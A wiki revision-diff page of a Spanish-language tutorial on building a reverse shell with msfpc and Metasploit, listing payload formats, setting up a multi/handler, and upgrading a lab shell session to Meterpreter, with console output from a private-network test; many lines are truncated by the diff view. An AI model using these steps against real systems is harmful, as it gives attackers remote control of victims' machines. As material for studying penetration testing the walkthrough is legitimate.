reverse_shell_with_metaexploit
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
| reverse_shell_with_metaexploit [2018/06/13 21:03] – jorpilo | reverse_shell_with_metaexploit [2018/08/30 04:07] (current) – jorpilo | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| ====== Reverse shell with metaexploit ====== | ====== Reverse shell with metaexploit ====== | ||
| + | Jorge Pinilla López | ||
| + | |||
| + | 2018/06/13 | ||
| + | |||
| Vamos a crear un reverse shell y a usarlo mediante un payload, metaexploit y meterpreter | Vamos a crear un reverse shell y a usarlo mediante un payload, metaexploit y meterpreter | ||
| Line 6: | Line 10: | ||
| Opciones por defecto: | Opciones por defecto: | ||
| - | *Port 443 | + | |
| - | *MSF | + | *MSF |
| - | *REVERSE | + | *REVERSE |
| - | *STAGELESS | + | *STAGELESS |
| - | *TCP | + | *TCP |
| Ejemplo de uso: | Ejemplo de uso: | ||
| < | < | ||
| Line 39: | Line 43: | ||
| Posibles payloads a generar: | Posibles payloads a generar: | ||
| + | *APK | ||
| + | *ASP | ||
| + | *ASPX | ||
| + | *Bash [.sh] | ||
| + | *Java [.jsp] | ||
| + | *Linux [.elf] | ||
| + | *OSX [.macho] | ||
| + | *Perl [.pl] | ||
| + | *PHP | ||
| + | *Powershell [.ps1] | ||
| + | *Python [.py] | ||
| + | *Tomcat [.war] | ||
| + | *Windows [.exe /.dll] | ||
| Esto genera dos archivos: | Esto genera dos archivos: | ||
| - | *linux-shell-staged-reverse-tcp-443.elf | + | |
| Archivo que el atacado debe ejecutar | Archivo que el atacado debe ejecutar | ||
| - | *linux-shell-staged-reverse-tcp-443-elf.rc | + | |
| Payload para multi/ | Payload para multi/ | ||
| Line 63: | Line 79: | ||
| sudo msfconsole -q -r '/ | sudo msfconsole -q -r '/ | ||
| </ | </ | ||
| + | ===== Creación del handler ===== | ||
| + | Usando el codigo que genra msfpc | ||
| + | < | ||
| + | bash$> sudo msfconsole -q -r '/ | ||
| + | [*] Processing / | ||
| + | resource (/ | ||
| + | resource (/ | ||
| + | PAYLOAD => linux/ | ||
| + | resource (/ | ||
| + | LHOST => 192.168.200.10 | ||
| + | resource (/ | ||
| + | LPORT => 443 | ||
| + | resource (/ | ||
| + | ExitOnSession => false | ||
| + | resource (/ | ||
| + | [*] Exploit running as background job 0. | ||
| + | [*] Started reverse TCP handler on 192.168.200.10: | ||
| + | </ | ||
| + | |||
| + | Esto configura el handler y lanza el trabajo en background 0 | ||
| + | < | ||
| + | msf exploit(multi/ | ||
| + | |||
| + | Background Threads | ||
| + | ================== | ||
| + | |||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | | ||
| + | </ | ||
| + | |||
| + | Cuando el atacado abre el archivo genera una nueva sesion en metaexploit, | ||
| + | < | ||
| + | msf exploit(multi/ | ||
| + | [*] Sending stage (36 bytes) to 192.168.200.164 | ||
| + | [*] Command shell session 1 opened (192.168.200.10: | ||
| + | |||
| + | msf exploit(multi/ | ||
| + | |||
| + | Active sessions | ||
| + | =============== | ||
| + | |||
| + | Id Name Type | ||
| + | -- ---- ---- | ||
| + | 1 shell x86/ | ||
| + | |||
| + | </ | ||
| + | |||
| + | Como podemo ver es una sesión de linux shell, para acceder a la sessión ejecutamos | ||
| + | |||
| + | < | ||
| + | msf exploit(multi/ | ||
| + | </ | ||
| + | |||
| + | y tendremos un shell en la maquina atacada. | ||
| + | |||
| + | ===== Meterpreter ===== | ||
| + | Vamos a ir un paso más y vamos a transformar dicha sesión de shell en una sesión de meterpreter, | ||
| + | < | ||
| + | msf exploit(multi/ | ||
| + | msf post(multi/ | ||
| + | SESSION => 1 | ||
| + | msf post(multi/ | ||
| + | |||
| + | [*] Upgrading session ID: 1 | ||
| + | [*] Starting exploit/ | ||
| + | [*] Started reverse TCP handler on 192.168.200.10: | ||
| + | [*] Sending stage (853256 bytes) to 192.168.200.164 | ||
| + | [*] Meterpreter session 2 opened (192.168.200.10: | ||
| + | [*] Command stager progress: 100.00% (773/773 bytes) | ||
| + | [*] Post module execution completed | ||
| + | </ | ||
| + | |||
| + | Si ahora vamos a sessions observamos las dos sesiones, podemos acceder a la session 2 de meterpreter: | ||
| + | < | ||
| + | msf post(multi/ | ||
| + | |||
| + | Active sessions | ||
| + | =============== | ||
| + | |||
| + | Id Name Type | ||
| + | -- ---- ---- | ||
| + | 1 shell x86/ | ||
| + | 2 | ||
| + | |||
| + | msf post(multi/ | ||
| + | [*] Starting interaction with 2... | ||
| + | |||
| + | meterpreter > | ||
| + | |||
| + | </ | ||
reverse_shell_with_metaexploit.1528923825.txt.gz · Last modified: by jorpilo
